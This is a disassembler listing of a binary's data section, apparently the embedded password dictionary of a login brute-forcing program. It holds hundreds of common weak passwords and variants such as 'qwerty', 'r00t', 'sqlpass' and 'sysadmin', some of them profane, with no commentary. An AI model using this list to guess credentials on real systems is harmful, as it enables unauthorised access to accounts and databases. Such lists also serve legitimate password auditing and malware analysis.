aUrsula db 'ursula',0 ; DATA XREF: .text:0042DF68�o
align 10h
aUrchin db 'urchin',0 ; DATA XREF: .text:0042DF64�o
align 4
aUranus db 'uranus',0 ; DATA XREF: .text:0042DF60�o
align 10h
aUpload db 'upload',0 ; DATA XREF: .text:0042DF5C�o
align 4
aUnlock db 'unlock',0 ; DATA XREF: .text:0042DF58�o
align 10h
aUnix db 'unix',0 ; DATA XREF: .text:0042DF54�o
align 4
aUniversi db 'universi',0 ; DATA XREF: .text:0042DF50�o
align 4
aUniverse db 'universe',0 ; DATA XREF: .text:0042DF4C�o
align 10h
aUniversa db 'universa',0 ; DATA XREF: .text:0042DF48�o
align 4
aUniform db 'uniform',0
aUnicorn db 'unicorn',0
aUnhappy db 'unhappy',0
aUndo db 'undo',0
align 4
aUncle db 'uncle',0
align 4
aUmesh db 'umesh',0
align 4
aUgly db 'ugly',0
align 4
aTuttle db 'tuttle',0
align 4
aTurnip db 'turnip',0
align 4
aTurn db 'turn',0
align 4
aTuesday db 'tuesday',0
aTubas db 'tubas',0
align 4
aTty db 'tty',0
aTruth db 'truth',0
align 4
aTrue db 'true',0
align 10h
aTron db 'tron',0
align 4
aTrombone db 'trombone',0
align 4
aTrojan db 'trojan',0
align 4
aTrivial db 'trivial',0
aTrisha db 'trisha',0
align 4
aTrek db 'trek',0
align 4
aTree db 'tree',0
align 4
aTrapdoor db 'trapdoor',0
align 4
aTrap db 'trap',0
align 10h
aTransfer db 'transfer',0
align 4
aTrails db 'trails',0
align 4
aTracy db 'tracy',0
align 4
aTracie db 'tracie',0
align 4
aTraci db 'traci',0
align 4
aToyota_0 db 'toyota',0 ; DATA XREF: .text:0042E69C�o
align 4
aToxic db 'toxic',0
align 4
aTortoise db 'tortoise',0
align 4
aTopography db 'topography',0
align 4
aTopograp db 'topograp',0
align 10h
aTomato db 'tomato',0
align 4
aTokenrin db 'tokenrin',0
align 4
aToken db 'token',0
align 4
aToggle db 'toggle',0
align 4
aToad db 'toad',0
align 4
aTits db 'tits',0
align 4
aTina db 'tina',0
align 4
aTime db 'time',0
align 4
aTiger db 'tiger',0 ; DATA XREF: .text:0042E690�o
align 4
aTiffany db 'tiffany',0
aThursday db 'thursday',0
align 10h
aThin db 'thin',0
align 4
aTheresa db 'theresa',0
aThailand db 'thailand',0
align 4
aText db 'text',0
align 4
aTetris db 'tetris',0
align 4
aTesting db 'testing',0
aTestin db 'testin',0
align 4
aTester db 'tester',0
align 4
aTest123 db 'test123',0
aTess db 'tess',0
align 4
aTerminat db 'terminat',0
align 10h
aTerminal db 'terminal',0
align 4
aTera db 'tera',0
align 4
aTennis db 'tennis',0
align 4
aTemptation db 'temptation',0
align 4
aTemptati db 'temptati',0
align 4
aTemp123 db 'temp123',0
aTemp_0 db 'temp',0
align 4
aTelnet db 'telnet',0
align 4
aTelephone db 'telephone',0
align 4
aTelephon db 'telephon',0
align 4
aTeenage db 'teenage',0
aTeen db 'teen',0
align 4
aTechnical db 'technical',0
align 10h
aTech db 'tech',0
align 4
aTears db 'tears',0 ; DATA XREF: .text:0042DE2C�o
align 10h
aTeapot db 'teapot',0 ; DATA XREF: .text:0042DE28�o
align 4
aTeam db 'team',0 ; DATA XREF: .text:0042DE24�o
align 10h
aTaylor db 'taylor',0 ; DATA XREF: .text:0042DE1C�o
align 4
aTarragon db 'tarragon',0 ; DATA XREF: .text:0042DE18�o
align 4
aTarget db 'target',0 ; DATA XREF: .text:0042DE14�o
align 4
aTara db 'tara',0 ; DATA XREF: .text:0042DE10�o
align 4
aTape db 'tape',0 ; DATA XREF: .text:0042DE0C�o
align 4
aTango db 'tango',0 ; DATA XREF: .text:0042DE08�o
align 4
aTangerine db 'tangerine',0 ; DATA XREF: .text:0042DE04�o
align 10h
aTangerin db 'tangerin',0 ; DATA XREF: .text:0042DE00�o
align 4
aTammy db 'tammy',0 ; DATA XREF: .text:0042DDFC�o
align 4
aTamie db 'tamie',0 ; DATA XREF: .text:0042DDF8�o
align 4
aTami db 'tami',0 ; DATA XREF: .text:0042DDF4�o
align 4
aTamara db 'tamara',0 ; DATA XREF: .text:0042DDF0�o
align 4
aTall db 'tall',0 ; DATA XREF: .text:0042DDEC�o
align 4
aTalk db 'talk',0 ; DATA XREF: .text:0042DDE8�o
align 4
aTabasco db 'tabasco',0 ; DATA XREF: .text:0042DDE4�o
aSysop db 'sysop',0 ; DATA XREF: .text:0042DDE0�o
align 4
aSysadmin db 'sysadmin',0 ; DATA XREF: .text:0042DDDC�o
align 4
aSys db 'sys',0 ; DATA XREF: .text:0042DDD8�o
aSymmetry db 'symmetry',0 ; DATA XREF: .text:0042DDD4�o
align 4
aSybil db 'sybil',0 ; DATA XREF: .text:0042DDD0�o
align 10h
aSybase db 'sybase',0 ; DATA XREF: .text:0042DDCC�o
align 4
aSword db 'sword',0 ; DATA XREF: .text:0042DDC8�o
align 10h
aSwitch db 'switch',0 ; DATA XREF: .text:0042DDC4�o
align 4
aSweat db 'sweat',0 ; DATA XREF: .text:0042DDC0�o
align 10h
aSwearer db 'swearer',0 ; DATA XREF: .text:0042DDBC�o
aSuzie db 'suzie',0 ; DATA XREF: .text:0042DDB8�o
align 10h
aSuzanne db 'suzanne',0 ; DATA XREF: .text:0042DDB4�o
aSusie db 'susie',0 ; DATA XREF: .text:0042DDB0�o
align 10h
aSusanne db 'susanne',0 ; DATA XREF: .text:0042DDAC�o
aSusan db 'susan',0 ; DATA XREF: .text:0042DDA8�o
align 10h
aSurfing db 'surfing',0 ; DATA XREF: .text:0042DDA4�o
aSurfer db 'surfer',0 ; DATA XREF: .text:0042DDA0�o
align 10h
aSupported db 'supported',0 ; DATA XREF: .text:0042DD9C�o
align 4
aSupporte db 'supporte',0 ; DATA XREF: .text:0042DD98�o
align 4
aSupport db 'support',0 ; DATA XREF: .text:0042DD94�o
aSupervis db 'supervis',0 ; DATA XREF: .text:0042DD90�o
align 4
aSuperuser db 'superuser',0 ; DATA XREF: .text:0042DD8C�o
align 4
aSuperuse db 'superuse',0 ; DATA XREF: .text:0042DD88�o
align 4
aSuperstage db 'superstage',0 ; DATA XREF: .text:0042DD84�o
align 10h
aSupersta db 'supersta',0 ; DATA XREF: .text:0042DD80�o
align 4
aSuperson db 'superson',0 ; DATA XREF: .text:0042DD7C�o
align 4
aSuperman db 'superman',0 ; DATA XREF: .text:0042DD78�o
align 4
aSuper db 'super',0 ; DATA XREF: .text:0042DD74�o
align 4
aSunday db 'sunday',0 ; DATA XREF: .text:0042DD70�o
align 4
aSun db 'sun',0 ; DATA XREF: .text:0042DD6C�o
aSummer db 'summer',0 ; DATA XREF: .text:0042DD68�o
align 10h
aSue db 'sue',0 ; DATA XREF: .text:0042DD64�o
aSucks db 'sucks',0 ; DATA XREF: .text:0042DD60�o
align 4
aSuckmydi db 'suckmydi',0 ; DATA XREF: .text:0042DD5C�o
align 4
aSuck db 'suck',0 ; DATA XREF: .text:0042DD58�o
align 10h
aSuccess db 'success',0 ; DATA XREF: .text:0042DD54�o
aSubway db 'subway',0 ; DATA XREF: .text:0042DD50�o
; .text:off_4254E0�o
align 10h
aSubscrib db 'subscrib',0 ; DATA XREF: .text:0042DD4C�o
align 4
aStuttgart db 'stuttgart',0 ; DATA XREF: .text:0042DD48�o
align 4
aStuttgar db 'stuttgar',0 ; DATA XREF: .text:0042DD44�o
align 4
aStudent1 db 'student1',0 ; DATA XREF: .text:0042DD40�o
align 10h
aStrip db 'strip',0 ; DATA XREF: .text:0042DD38�o
align 4
aString db 'string',0 ; DATA XREF: .text:0042DD34�o
align 10h
aStreetfi db 'streetfi',0 ; DATA XREF: .text:0042DD30�o
align 4
aStratford db 'stratford',0 ; DATA XREF: .text:0042DD2C�o
align 4
aStratfor db 'stratfor',0 ; DATA XREF: .text:0042DD28�o
align 4
aStrangle db 'strangle',0 ; DATA XREF: .text:0042DD24�o
align 10h
aStrange db 'strange',0 ; DATA XREF: .text:0042DD20�o
aStones db 'stones',0 ; DATA XREF: .text:0042DD1C�o
align 10h
aStoned db 'stoned',0 ; DATA XREF: .text:0042DD18�o
align 4
aStoneage db 'stoneage',0 ; DATA XREF: .text:0042DD14�o
align 4
aSteve db 'steve',0 ; DATA XREF: .text:0042DD10�o
align 4
aStereo db 'stereo',0 ; DATA XREF: .text:0042DD0C�o
align 4
aStephanie db 'stephanie',0 ; DATA XREF: .text:0042DD08�o
align 10h
aStephani db 'stephani',0 ; DATA XREF: .text:0042DD04�o
align 4
aSteph db 'steph',0 ; DATA XREF: .text:0042DD00�o
align 4
aSteel db 'steel',0 ; DATA XREF: .text:0042DCFC�o
align 4
aSteal db 'steal',0 ; DATA XREF: .text:0042DCF8�o
align 4
aSteak db 'steak',0 ; DATA XREF: .text:0042DCF4�o
align 4
aStarwars db 'starwars',0 ; DATA XREF: .text:0042DCF0�o
align 4
aStartup db 'startup',0 ; DATA XREF: .text:0042DCEC�o
aStartrek db 'startrek',0 ; DATA XREF: .text:0042DCE8�o
align 4
aStart db 'start',0 ; DATA XREF: sub_40CD3A+1E47�o
; .text:0042DCE4�o
align 4
aStarship db 'starship',0 ; DATA XREF: .text:0042DCE0�o
align 10h
aStar db 'star',0 ; DATA XREF: .text:0042DCDC�o
align 4
aStacy db 'stacy',0 ; DATA XREF: .text:0042DCD4�o
align 10h
aStacie db 'stacie',0 ; DATA XREF: .text:0042DCD0�o
align 4
aStaci db 'staci',0 ; DATA XREF: .text:0042DCCC�o
align 10h
aStacey db 'stacey',0 ; DATA XREF: .text:0042DCC8�o
align 4
aSr71 db 'sr71',0 ; DATA XREF: .text:0042DCC4�o
align 10h
aSquires db 'squires',0 ; DATA XREF: .text:0042DCC0�o
aSqlpass db 'sqlpass',0 ; DATA XREF: .text:0042DCBC�o
aSqlagent db 'sqlagent',0 ; DATA XREF: .text:0042DCB8�o
align 4
aSql db 'sql',0 ; DATA XREF: .text:0042DCB4�o
aSpunk db 'spunk',0 ; DATA XREF: .text:0042DCB0�o
align 4
aSpringer db 'springer',0 ; DATA XREF: .text:0042DCAC�o
align 4
aSpring db 'spring',0 ; DATA XREF: .text:0042DCA8�o
align 4
aSpred db 'spred',0 ; DATA XREF: .text:0042DCA4�o
align 4
aSpit db 'spit',0 ; DATA XREF: .text:0042DCA0�o
align 4
aSpiderma db 'spiderma',0 ; DATA XREF: .text:0042DC9C�o
align 4
aSpider db 'spider',0 ; DATA XREF: .text:0042DC98�o
align 10h
aSpice db 'spice',0 ; DATA XREF: .text:0042DC94�o
align 4
aSpencer db 'spencer',0 ; DATA XREF: .text:0042DC90�o
aSpell db 'spell',0 ; DATA XREF: .text:0042DC8C�o
align 4
aSpear db 'spear',0 ; DATA XREF: .text:0042DC88�o
align 10h
aSparrows db 'sparrows',0 ; DATA XREF: .text:0042DC84�o
align 4
aSpaceshi db 'spaceshi',0 ; DATA XREF: .text:0042DC80�o
align 4
aSpaceman db 'spaceman',0 ; DATA XREF: .text:0042DC7C�o
align 4
aSouth db 'south',0 ; DATA XREF: .text:0042DC78�o
align 4
aSource db 'source',0 ; DATA XREF: .text:0042DC74�o
align 4
aSossina db 'sossina',0 ; DATA XREF: .text:0042DC70�o
aSonya db 'sonya',0 ; DATA XREF: .text:0042DC6C�o
align 4
aSonic db 'sonic',0 ; DATA XREF: .text:0042DC68�o
align 4
aSonia db 'sonia',0 ; DATA XREF: .text:0042DC64�o
align 4
aSondra db 'sondra',0 ; DATA XREF: .text:0042DC60�o
align 4
aSomebody db 'somebody',0 ; DATA XREF: .text:0042DC5C�o
align 4
aSoftware db 'software',0 ; DATA XREF: .text:0042DC58�o
align 4
aSoft db 'soft',0 ; DATA XREF: .text:0042DC54�o
align 4
aSodomy db 'sodomy',0 ; DATA XREF: .text:0042DC50�o
align 4
aSocrates db 'socrates',0 ; DATA XREF: .text:0042DC4C�o
align 10h
aSocial db 'social',0 ; DATA XREF: .text:0042DC48�o
align 4
aSoap db 'soap',0 ; DATA XREF: .text:0042DC44�o
align 10h
aSnoopy db 'snoopy',0 ; DATA XREF: .text:0042DC40�o
align 4
aSnatch db 'snatch',0 ; DATA XREF: .text:0042DC3C�o
align 10h
aSnake db 'snake',0 ; DATA XREF: .text:0042DC38�o
align 4
aSnafu db 'snafu',0 ; DATA XREF: .text:0042DC34�o
align 10h
aSnach db 'snach',0 ; DATA XREF: .text:0042DC30�o
align 4
aSmut db 'smut',0 ; DATA XREF: .text:0042DC2C�o
align 10h
aSmtp db 'smtp',0 ; DATA XREF: .text:0042DC28�o
align 4
aSmother db 'smother',0 ; DATA XREF: .text:0042DC24�o
aSmooch db 'smooch',0 ; DATA XREF: .text:0042DC20�o
align 4
aSmiles db 'smiles',0 ; DATA XREF: .text:0042DC1C�o
align 10h
aSmile db 'smile',0 ; DATA XREF: .text:0042DC18�o
align 4
aSmart db 'smart',0 ; DATA XREF: .text:0042DC14�o
align 10h
aSmall db 'small',0 ; DATA XREF: .text:0042DC10�o
align 4
aSlut db 'slut',0 ; DATA XREF: .text:0042DC0C�o
align 10h
aSlow db 'slow',0 ; DATA XREF: .text:0042DC08�o
align 4
aSliders db 'sliders',0 ; DATA XREF: .text:0042DC04�o
aSlick db 'slick',0 ; DATA XREF: .text:0042DC00�o
align 4
aSlave db 'slave',0 ; DATA XREF: .text:0042DBFC�o
align 10h
aSkull db 'skull',0 ; DATA XREF: .text:0042DBF8�o
align 4
aSite db 'site',0 ; DATA XREF: .text:0042DBF4�o
align 10h
aSingle db 'single',0 ; DATA XREF: .text:0042DBF0�o
align 4
aSinger db 'singer',0 ; DATA XREF: .text:0042DBEC�o
align 10h
aSimulati db 'simulati',0 ; DATA XREF: .text:0042DBE8�o
align 4
aSimpsons db 'simpsons',0 ; DATA XREF: .text:0042DBE4�o
align 4
aSimple db 'simple',0 ; DATA XREF: .text:0042DBE0�o
align 10h
aSimon db 'simon',0 ; DATA XREF: .text:0042DBDC�o
align 4
aSimcity db 'simcity',0 ; DATA XREF: .text:0042DBD8�o
aSilver db 'silver',0 ; DATA XREF: .text:0042DBD4�o
align 4
aSignature db 'signature',0 ; DATA XREF: .text:0042DBD0�o
align 4
aSignatur db 'signatur',0 ; DATA XREF: .text:0042DBCC�o
align 10h
aSierra db 'sierra',0 ; DATA XREF: .text:0042DBC8�o
align 4
aSiemens db 'siemens',0 ; DATA XREF: .text:0042DBC4�o
aSick db 'sick',0 ; DATA XREF: .text:0042DBC0�o
align 4
aShuttle db 'shuttle',0 ; DATA XREF: .text:0042DBBC�o
aShort db 'short',0 ; DATA XREF: .text:0042DBB8�o
align 4
aShivers db 'shivers',0 ; DATA XREF: .text:0042DBB4�o
aShiva db 'shiva',0 ; DATA XREF: .text:0042DBB0�o
align 4
aShitpot db 'shitpot',0 ; DATA XREF: .text:0042DBAC�o
aShit db 'shit',0 ; DATA XREF: .text:0042DBA8�o
align 4
aShirley db 'shirley',0 ; DATA XREF: .text:0042DBA4�o
aShift db 'shift',0 ; DATA XREF: .text:0042DBA0�o
align 4
aSherri db 'sherri',0 ; DATA XREF: .text:0042DB9C�o
align 10h
aShell db 'shell',0 ; DATA XREF: .text:0042DB98�o
align 4
aSheldon db 'sheldon',0 ; DATA XREF: .text:0042DB94�o
aSheffield db 'sheffield',0 ; DATA XREF: .text:0042DB90�o
align 4
aSheffiel db 'sheffiel',0 ; DATA XREF: .text:0042DB8C�o
align 4
aSharon db 'sharon',0 ; DATA XREF: .text:0042DB88�o
align 10h
aSharks db 'sharks',0 ; DATA XREF: .text:0042DB84�o
align 4
aShark db 'shark',0 ; DATA XREF: .text:0042DB80�o
align 10h
aSharc db 'sharc',0 ; DATA XREF: .text:0042DB7C�o
align 4
aShannon db 'shannon',0 ; DATA XREF: .text:0042DB78�o
aSexy db 'sexy',0 ; DATA XREF: .text:0042DB74�o
align 4
aSex_0 db 'sex',0 ; DATA XREF: .text:0042DB70�o
aSesame db 'sesame',0 ; DATA XREF: .text:0042DB6C�o
align 4
aService db 'service',0 ; DATA XREF: .text:0042DB68�o
; .text:0042E670�o
aSerial_0 db 'serial',0 ; DATA XREF: .text:0042DB64�o
align 4
aSerenity db 'serenity',0 ; DATA XREF: .text:0042DB60�o
align 10h
aSentry db 'sentry',0 ; DATA XREF: .text:0042DB5C�o
align 4
aSentinel db 'sentinel',0 ; DATA XREF: .text:0042DB58�o
align 4
aSensor db 'sensor',0 ; DATA XREF: .text:0042DB54�o
align 4
aSega db 'sega',0 ; DATA XREF: .text:0042DB50�o
align 4
aSeed db 'seed',0 ; DATA XREF: .text:0042DB4C�o
align 4
aSecurity db 'security',0 ; DATA XREF: .text:0042DB48�o
align 4
aSecret db 'secret',0 ; DATA XREF: .text:0042DB44�o
align 10h
aSearch db 'search',0 ; DATA XREF: .text:0042DB40�o
align 4
aScriptkiddie db 'scriptkiddie',0 ; DATA XREF: .text:0042DB3C�o
align 4
aScript db 'script',0 ; DATA XREF: .text:0042DB38�o
align 10h
aScout db 'scout',0 ; DATA XREF: .text:0042DB34�o
align 4
aScotty db 'scotty',0 ; DATA XREF: .text:0042DB30�o
align 10h
aScott db 'scott',0 ; DATA XREF: .text:0042DB2C�o
align 4
aScorpion db 'scorpion',0 ; DATA XREF: .text:0042DB28�o
align 4
aScifi db 'scifi',0 ; DATA XREF: .text:0042DB24�o
align 4
aSchoolsucks db 'schoolsucks',0 ; DATA XREF: .text:0042DB20�o
aSchool db 'school',0 ; DATA XREF: .text:0042DB1C�o
align 10h
aScheme db 'scheme',0 ; DATA XREF: .text:0042DB18�o
align 4
aScamper db 'scamper',0 ; DATA XREF: .text:0042DB14�o
aSaxon db 'saxon',0 ; DATA XREF: .text:0042DB10�o
align 4
aSaturn db 'saturn',0 ; DATA XREF: .text:0042DB0C�o
align 10h
aSaturday db 'saturday',0 ; DATA XREF: .text:0042DB08�o
align 4
aSatanik db 'satanik',0 ; DATA XREF: .text:0042DB04�o
aSatanic db 'satanic',0 ; DATA XREF: .text:0042DB00�o
aSatan db 'satan',0 ; DATA XREF: .text:0042DAFC�o
align 4
aSarah db 'sarah',0 ; DATA XREF: .text:0042DAF8�o
align 4
aSara db 'sara',0 ; DATA XREF: .text:0042DAF4�o
align 4
aSandy db 'sandy',0 ; DATA XREF: .text:0042DAF0�o
align 4
aSandra db 'sandra',0 ; DATA XREF: .text:0042DAEC�o
align 4
aSample db 'sample',0 ; DATA XREF: .text:0042DAE8�o
align 4
aSamantha db 'samantha',0 ; DATA XREF: .text:0042DAE4�o
align 4
aSam db 'sam',0 ; DATA XREF: .text:0042DAE0�o
aSalt db 'salt',0 ; DATA XREF: .text:0042DADC�o
align 4
aSale db 'sale',0 ; DATA XREF: .text:0042DAD8�o
align 4
aSalami db 'salami',0 ; DATA XREF: .text:0042DAD4�o
align 4
aSal db 'sal',0 ; DATA XREF: .text:0042DAD0�o
aSage db 'sage',0 ; DATA XREF: .text:0042DACC�o
align 10h
aSafe db 'safe',0 ; DATA XREF: .text:0042DAC8�o
align 4
aRuth db 'ruth',0 ; DATA XREF: .text:0042DAC0�o
align 10h
aRush db 'rush',0 ; DATA XREF: .text:0042DABC�o
align 4
aRunning db 'running',0 ; DATA XREF: .text:0042DAB8�o
aRules db 'rules',0 ; DATA XREF: .text:0042DAB4�o
align 4
aRude db 'rude',0 ; DATA XREF: .text:0042DAB0�o
align 10h
aRuby db 'ruby',0 ; DATA XREF: .text:0042DAAC�o
align 4
aRuben db 'ruben',0 ; DATA XREF: .text:0042DAA8�o
align 10h
aRubber db 'rubber',0 ; DATA XREF: .text:0042DAA4�o
align 4
aRough db 'rough',0 ; DATA XREF: .text:0042DAA0�o
align 10h
aRoses db 'roses',0 ; DATA XREF: .text:0042DA9C�o
align 4
aRosemary db 'rosemary',0 ; DATA XREF: .text:0042DA98�o
align 4
aRosebud db 'rosebud',0 ; DATA XREF: .text:0042DA94�o
aRose db 'rose',0 ; DATA XREF: .text:0042DA90�o
align 4
aRooted db 'rooted',0 ; DATA XREF: .text:0042DA8C�o
align 4
aRonald db 'ronald',0 ; DATA XREF: .text:0042DA88�o
align 4
aRon db 'ron',0 ; DATA XREF: .text:0042DA84�o
aRomulan db 'romulan',0 ; DATA XREF: .text:0042DA80�o
aRomeo db 'romeo',0 ; DATA XREF: .text:0042DA7C�o
align 4
aRomano db 'romano',0 ; DATA XREF: .text:0042DA78�o
align 10h
aRolex db 'rolex',0 ; DATA XREF: .text:0042DA74�o
align 4
aRodent db 'rodent',0 ; DATA XREF: .text:0042DA70�o
align 10h
aRockyhor db 'rockyhor',0 ; DATA XREF: .text:0042DA6C�o
align 4
aRocky db 'rocky',0 ; DATA XREF: .text:0042DA68�o
align 4
aRock db 'rock',0 ; DATA XREF: .text:0042DA64�o
align 4
aRochester db 'rochester',0 ; DATA XREF: .text:0042DA60�o
align 4
aRocheste db 'rocheste',0 ; DATA XREF: .text:0042DA5C�o
align 4
aRochelle db 'rochelle',0 ; DATA XREF: .text:0042DA58�o
align 10h
aRobyn db 'robyn',0 ; DATA XREF: .text:0042DA54�o
align 4
aRobotics db 'robotics',0 ; DATA XREF: .text:0042DA50�o
align 4
aRobot db 'robot',0 ; DATA XREF: .text:0042DA4C�o
align 4
aRobin db 'robin',0 ; DATA XREF: .text:0042DA48�o
align 4
aRobert db 'robert',0 ; DATA XREF: .text:0042DA44�o
align 4
aRoach db 'roach',0 ; DATA XREF: .text:0042DA40�o
align 4
aRje db 'rje',0 ; DATA XREF: .text:0042DA3C�o
aRisc db 'risc',0 ; DATA XREF: .text:0042DA38�o
align 10h
aRipple db 'ripple',0 ; DATA XREF: .text:0042DA34�o
align 4
aRiot db 'riot',0 ; DATA XREF: .text:0042DA30�o
align 10h
aRing db 'ring',0 ; DATA XREF: .text:0042DA2C�o
align 4
aRightwin db 'rightwin',0 ; DATA XREF: .text:0042DA28�o
align 4
aRight db 'right',0 ; DATA XREF: .text:0042DA24�o
align 4
aRiffraff db 'riffraff',0 ; DATA XREF: .text:0042DA20�o
align 4
aRick db 'rick',0 ; DATA XREF: .text:0042DA1C�o
align 10h
aRich db 'rich',0 ; DATA XREF: .text:0042DA18�o
align 4
aRhino db 'rhino',0 ; DATA XREF: .text:0042DA14�o
align 10h
aReveal db 'reveal',0 ; DATA XREF: .text:0042DA10�o
align 4
aResistan db 'resistan',0 ; DATA XREF: .text:0042DA0C�o
align 4
aRepublic db 'republic',0 ; DATA XREF: .text:0042DA08�o
align 10h
aReport db 'report',0 ; DATA XREF: .text:0042DA04�o
align 4
aRent db 'rent',0 ; DATA XREF: .text:0042DA00�o
align 10h
aReno db 'reno',0 ; DATA XREF: .text:0042D9FC�o
align 4
aRenee db 'renee',0 ; DATA XREF: .text:0042D9F8�o
align 10h
aRemote db 'remote',0 ; DATA XREF: .text:0042D9F4�o
align 4
aRelease db 'release',0 ; DATA XREF: .text:0042D9F0�o
aRegional db 'regional',0 ; DATA XREF: .text:0042D9EC�o
align 4
aReferenc db 'referenc',0 ; DATA XREF: .text:0042D9E8�o
align 4
aRedhead db 'redhead',0 ; DATA XREF: .text:0042D9E4�o
aReddawn db 'reddawn',0 ; DATA XREF: .text:0042D9E0�o
aRecord db 'record',0 ; DATA XREF: .text:0042D9DC�o
align 10h
aRebel db 'rebel',0 ; DATA XREF: .text:0042D9D8�o
align 4
aRebecca db 'rebecca',0 ; DATA XREF: .text:0042D9D4�o
aRebal db 'rebal',0 ; DATA XREF: .text:0042D9D0�o
align 4
aReaper db 'reaper',0 ; DATA XREF: .text:0042D9CC�o
align 10h
aReam db 'ream',0 ; DATA XREF: .text:0042D9C8�o
align 4
aReally db 'really',0 ; DATA XREF: .text:0042D9C4�o
align 10h
aReality db 'reality',0 ; DATA XREF: .text:0042D9C0�o
aReagan db 'reagan',0 ; DATA XREF: .text:0042D9BC�o
align 10h
aRazor db 'razor',0 ; DATA XREF: .text:0042D9B8�o
align 4
aRascal db 'rascal',0 ; DATA XREF: .text:0042D9B4�o
align 10h
aRape db 'rape',0 ; DATA XREF: .text:0042D9B0�o
align 4
aRaleigh db 'raleigh',0 ; DATA XREF: .text:0042D9A8�o
aRaindrop db 'raindrop',0 ; DATA XREF: .text:0042D9A4�o
align 4
aRainbow db 'rainbow',0 ; DATA XREF: .text:0042D9A0�o
aRain db 'rain',0 ; DATA XREF: .text:0042D99C�o
align 4
aRaid db 'raid',0 ; DATA XREF: .text:0042D998�o
align 4
aRachmaninoff db 'rachmaninoff',0 ; DATA XREF: .text:0042D994�o
align 4
aRachmani db 'rachmani',0 ; DATA XREF: .text:0042D990�o
align 10h
aRachelle db 'rachelle',0 ; DATA XREF: .text:0042D98C�o
align 4
aRachel db 'rachel',0 ; DATA XREF: .text:0042D988�o
align 4
aRabbit db 'rabbit',0 ; DATA XREF: .text:0042D984�o
align 4
aR00t db 'r00t',0 ; DATA XREF: .text:0042D980�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .text:0042D97C�o
; .text:0042E654�o
align 4
aQwert db 'qwert',0 ; DATA XREF: .text:0042D978�o
; .text:0042E650�o
align 4
aQwer db 'qwer',0 ; DATA XREF: .text:0042D974�o
; .text:0042E64C�o
align 4
aQwe db 'qwe',0 ; DATA XREF: .text:0042D970�o
; .text:0042E648�o
aQuebec db 'quebec',0 ; DATA XREF: .text:0042D96C�o
align 4
aQaz db 'qaz',0 ; DATA XREF: .text:0042D968�o
; .text:0042E710�o
aPwd db 'pwd',0 ; DATA XREF: .text:0042D964�o
aPw123 db 'pw123',0 ; DATA XREF: .text:0042D960�o
align 4
aPw db 'pw',0 ; DATA XREF: .text:0042D95C�o
align 4
aPussy db 'pussy',0 ; DATA XREF: .text:0042D958�o
align 4
aPuppet db 'puppet',0 ; DATA XREF: .text:0042D954�o
align 4
aPunk db 'punk',0 ; DATA XREF: .text:0042D950�o
align 4
aPunisher db 'punisher',0 ; DATA XREF: .text:0042D94C�o
align 10h
aPuneet db 'puneet',0 ; DATA XREF: .text:0042D948�o
align 4
aPumpkin db 'pumpkin',0 ; DATA XREF: .text:0042D944�o
aPuke db 'puke',0 ; DATA XREF: .text:0042D940�o
align 4
aPuck db 'puck',0 ; DATA XREF: .text:0042D93C�o
align 10h
aPublic db 'public',0 ; DATA XREF: .text:0042D938�o
align 4
aPub db 'pub',0 ; DATA XREF: .text:0042D934�o
aPsychopa db 'psychopa',0 ; DATA XREF: .text:0042D930�o
align 4
aPsycho db 'psycho',0 ; DATA XREF: .text:0042D92C�o
align 10h
aProtozoa db 'protozoa',0 ; DATA XREF: .text:0042D928�o
align 4
aProtect db 'protect',0 ; DATA XREF: .text:0042D924�o
aPrompt db 'prompt',0 ; DATA XREF: .text:0042D920�o
align 4
aProgram db 'program',0 ; DATA XREF: .text:0042D91C�o
aProfile db 'profile',0 ; DATA XREF: .text:0042D918�o
aProfessor db 'professor',0 ; DATA XREF: .text:0042D914�o
align 4
aProfesso db 'professo',0 ; DATA XREF: .text:0042D910�o
align 4
aProcesso db 'processo',0 ; DATA XREF: .text:0042D90C�o
align 10h
aProceed db 'proceed',0 ; DATA XREF: .text:0042D908�o
aPrivs db 'privs',0 ; DATA XREF: .text:0042D904�o
align 10h
aPrivate db 'private',0 ; DATA XREF: .text:0042D900�o
aPriv db 'priv',0 ; DATA XREF: .text:0042D8FC�o
align 10h
aPrinter db 'printer',0 ; DATA XREF: .text:0042D8F8�o
aPrinceton db 'princeton',0 ; DATA XREF: .text:0042D8F4�o
align 4
aPrinceto db 'princeto',0 ; DATA XREF: .text:0042D8F0�o
align 10h
aPrince db 'prince',0 ; DATA XREF: .text:0042D8EC�o
align 4
aPresto db 'presto',0 ; DATA XREF: .text:0042D8E8�o
align 10h
aPrelude db 'prelude',0 ; DATA XREF: .text:0042D8E4�o
aPrecious db 'precious',0 ; DATA XREF: .text:0042D8E0�o
align 4
aPraise db 'praise',0 ; DATA XREF: .text:0042D8DC�o
align 4
aPower db 'power',0 ; DATA XREF: .text:0042D8D8�o
align 4
aPoster db 'poster',0 ; DATA XREF: .text:0042D8D4�o
align 4
aPost db 'post',0 ; DATA XREF: .text:0042D8D0�o
align 4
aPorsche db 'porsche',0 ; DATA XREF: .text:0042D8CC�o
aPorno db 'porno',0 ; DATA XREF: .text:0042D8C8�o
align 4
aPorn db 'porn',0 ; DATA XREF: .text:0042D8C4�o
align 4
aPork db 'pork',0 ; DATA XREF: .text:0042D8C0�o
align 4
aPoor db 'poor',0 ; DATA XREF: .text:0042D8BC�o
align 4
aPoop db 'poop',0 ; DATA XREF: .text:0042D8B8�o
align 4
aPondering db 'pondering',0 ; DATA XREF: .text:0042D8B4�o
align 10h
aPonderin db 'ponderin',0 ; DATA XREF: .text:0042D8B0�o
align 4
aPolynomial db 'polynomial',0 ; DATA XREF: .text:0042D8AC�o
align 4
aPolynomi db 'polynomi',0 ; DATA XREF: .text:0042D8A8�o
align 4
aPolly db 'polly',0 ; DATA XREF: .text:0042D8A4�o
align 4
aPolice db 'police',0 ; DATA XREF: .text:0042D8A0�o
align 4
aPoetry db 'poetry',0 ; DATA XREF: .text:0042D89C�o
align 4
aPlymouth db 'plymouth',0 ; DATA XREF: .text:0042D898�o
align 4
aPluto db 'pluto',0 ; DATA XREF: .text:0042D894�o
align 10h
aPlover db 'plover',0 ; DATA XREF: .text:0042D890�o
align 4
aPlayboy db 'playboy',0 ; DATA XREF: .text:0042D88C�o
aPlane db 'plane',0 ; DATA XREF: .text:0042D888�o
align 4
aPizza db 'pizza',0 ; DATA XREF: .text:0042D884�o
align 10h
aPiss db 'piss',0 ; DATA XREF: .text:0042D880�o
align 4
aPinname db 'pinname',0 ; DATA XREF: .text:0042D87C�o
aPink db 'pink',0 ; DATA XREF: .text:0042D878�o
align 4
aPimp db 'pimp',0 ; DATA XREF: .text:0042D874�o
align 10h
